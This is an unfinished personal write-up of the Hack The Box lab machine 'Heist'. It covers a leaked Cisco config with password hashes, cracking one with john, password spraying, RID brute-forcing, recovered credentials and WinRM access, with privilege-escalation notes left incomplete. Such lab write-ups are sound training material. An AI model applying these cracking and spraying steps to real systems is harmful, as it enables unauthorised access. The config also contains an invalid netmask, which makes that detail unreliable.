Heist - Writeup - TODO (privesc) - BUGGY

## Service Enumeration ### SMB No love ### WAPP Microsoft IIS httpd 10.0 - seems to not like being spammed with requests (gobuster enumeration) - does not appear to be running a known WAPP - can login as guest?? ![[Pasted image 20250306152626.png]] - http://10.10.10.149/attachments/config.txt - appears to be a cisco server config - https://www.cisco.com/c/dam/en/us/td/docs/solutions/Enterprise/Data_Center/VXI/configuration/3560-Branch-configuration.pdf ``` version 12.2 no service pad service password-encryption ! isdn switch-type basic-5ess ! hostname ios-1 ! security passwords min-length 12 enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91 ! username rout3r password 7 0242114B0E143F015F5D1E161713 username admin privilege 15 password 7 02375012182C1A1D751618034F36415408 ! ! ip ssh authentication-retries 5 ip ssh version 2 ! ! router bgp 100 synchronization bgp log-neighbor-changes bgp dampening network 192.168.0.0 mask 300.255.255.0 timers bgp 3 9 redistribute connected ! ip classless ip route 0.0.0.0 0.0.0.0 192.168.0.1 ! ! access-list 101 permit ip any any dialer-list 1 protocol ip list 101 ! no ip http server no ip http secure-server ! line vty 0 4 session-timeout 600 authorization exec SSH transport input ssh ``` ## Initial Access Cracking the MD5 hash found in the config file: ``` ╭─[λ]-[/targets/heist]-[10.10.10.149] ╰─> john ./cisco_router.hash --wordlist=/arsenal/resources/rockyou.txt Loaded 1 password hash (md5crypt [MD5 32/64 X2]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status stealth1agent (?) ``` Password: `stealth1agent` ``` ╭─[λ]-[/targets/heist]-[10.10.10.149] ╰─> cat users.txt rout3r admin Hazard ``` Running that against SMB yields a hit for `Hazard:stealth1agent`. Performing some [[RID Brute]] magic reveals a couple of new users. Attempting another password spray yields a pwn for `Chase:Q4)sJu\Y8qz*A3?d`. Which in turns enables access through winrm. ## Privesc - users - Chase (got user folder) - Hazard (got user folder) - Admin - Jason - Support - no SeImpersonate - no systeminfo (access denied) - tasklist (access denied) - `netsh fiewall show config` mentions firefox